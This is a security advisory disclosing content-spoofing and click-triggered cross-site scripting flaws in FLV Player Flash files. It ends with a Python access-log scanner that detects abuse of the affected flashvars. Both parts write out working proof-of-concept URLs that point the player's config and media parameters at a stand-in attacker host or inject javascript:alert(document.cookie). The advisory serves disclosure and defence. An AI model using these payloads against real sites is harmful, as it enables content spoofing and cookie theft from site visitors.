Hello list!

I want to warn you about Content Spoofing and Cross-Site Scripting vulnerabilities in FLV Player.

-------------------------
Affected products:
-------------------------

Different versions of FLV Player (MINI, NORMAL, MAXI and MULTI) are vulnerable. Note that the NORMAL version occurs under the names player_flv.swf and player_flv_classic.swf.

The author of FLV Player didn't fix these vulnerabilities.

----------
Details:
----------

Content Spoofing (WASC-12):

The Flash files of FLV Player accept arbitrary addresses in the parameter configxml, which allows spoofing the content of the flash file, i.e. by setting the address of a configuration file from another site.

http://site/player_flv.swf?configxml=http://attacker/1.xml
http://site/player_flv_maxi.swf?configxml=http://attacker/1.xml
http://site/player_flv_multi.swf?configxml=http://attacker/1.xml

The Flash files of FLV Player also accept arbitrary addresses in the parameter config, which allows the same spoofing by setting the address of a configuration file from another site.

http://site/player_flv.swf?config=http://attacker/1.txt
http://site/player_flv_maxi.swf?config=http://attacker/1.txt
http://site/player_flv_multi.swf?config=http://attacker/1.txt

The Flash files of FLV Player allow spoofing of all important parameters, including flv and startimage, and accept arbitrary addresses in the parameters flv and startimage, which allows spoofing the content of the flash file, i.e. by setting the addresses of the video and the image from another site. The parameters onclick and ondoubleclick can be used to set links to an arbitrary site.

http://site/player_flv.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_maxi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_multi.swf?flv=http://attacker/1.flv&startimage=http://attacker/1.jpg
http://site/player_flv_mini.swf?flv=http://attacker/1.flv

XSS (WASC-08):

http://site/player_flv_maxi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?onclick=javascript:alert(document.cookie)
http://site/player_flv_maxi.swf?ondoubleclick=javascript:alert(document.cookie)
http://site/player_flv_multi.swf?ondoubleclick=javascript:alert(document.cookie)

http://site/player_flv_maxi.swf?configxml=http://attacker/xss.xml
http://site/player_flv_multi.swf?configxml=http://attacker/xss.xml

File xss.xml:

http://site/player_flv_maxi.swf?config=http://attacker/xss.txt
http://site/player_flv_multi.swf?config=http://attacker/xss.txt

File xss.txt:

onclick=javascript:alert(document.cookie)
ondoubleclick=javascript:alert(document.cookie)

The code will execute after a click (or double click). It's strictly social XSS.

------------
Timeline:
------------

2011.02.24 - found these vulnerabilities in different versions of the player and informed the owner of the site which used it.
2011.04.21 - announced at my site.
2011.04.22 - informed the developer.
2011.08.20 - disclosed at my site.

I mentioned these vulnerabilities at my site (http://websecurity.com.ua/5098/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
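As an added example, not code from the advisory above or from the FLV Player project: a Python check that a site operator could run over web-server access logs to flag requests which pass the flashvars named in the advisory with an off-site address or a script-scheme link. The log lines are constructed, and the host names "site" and "attacker" follow the advisory's own URLs.

```python
"""Flag FLV Player requests whose flashvars point off-site or use a script scheme."""
import re
from urllib.parse import urlsplit, parse_qs

# Flashvars the advisory names: address ones (content spoofing) and link ones (click XSS).
ADDRESS_PARAMS = {"configxml", "config", "flv", "startimage"}  # accept arbitrary addresses
LINK_PARAMS = {"onclick", "ondoubleclick"}                      # accept javascript: links

PLAYER_RE = re.compile(r"player_flv(_mini|_maxi|_multi|_classic)?\.swf$", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def check_player_url(url, own_hosts):
    """Return (flashvar, offending value) pairs for one player request URL;
    own_hosts are lower-case hosts allowed to serve config and media."""
    parts = urlsplit(url)
    if not PLAYER_RE.search(parts.path):
        return []
    findings = []
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        key = name.lower()
        for value in values:
            # Strip control characters and blanks so "java\tscript:" is still caught.
            target = urlsplit(re.sub(r"[\x00-\x20]", "", value))
            host = (target.hostname or "").lower()  # "" for relative paths, which are fine
            if key in ADDRESS_PARAMS and host and host not in own_hosts:
                findings.append((key, value))   # config/media fetched from another site
            elif key in LINK_PARAMS and target.scheme.lower() in ("javascript", "vbscript", "data"):
                findings.append((key, value))   # click target would run script
    return findings

def scan_access_log(lines, own_hosts):
    """Run check_player_url over every request in combined-format log lines."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if match:
            for key, value in check_player_url(match.group(1), own_hosts):
                hits.append((match.group(1), key, value))
    return hits

# Constructed sample log lines; hosts "site" and "attacker" follow the advisory.
SAMPLE_LOG = [
    '198.51.100.4 - - [20/Aug/2011:10:00:01 +0000] "GET /player_flv_maxi.swf?configxml=http://attacker/1.xml HTTP/1.1" 200 9876',
    '198.51.100.4 - - [20/Aug/2011:10:00:02 +0000] "GET /player_flv_multi.swf?onclick=javascript:alert(document.cookie) HTTP/1.1" 200 9876',
    '198.51.100.9 - - [20/Aug/2011:10:00:03 +0000] "GET /player_flv.swf?flv=videos/intro.flv&startimage=img/intro.jpg HTTP/1.1" 200 9876',
]

if __name__ == "__main__":
    for url, key, value in scan_access_log(SAMPLE_LOG, {"site"}):
        print(f"{url}: {key}={value}")
```

Only the first two sample requests are reported; the third uses relative paths and is left alone.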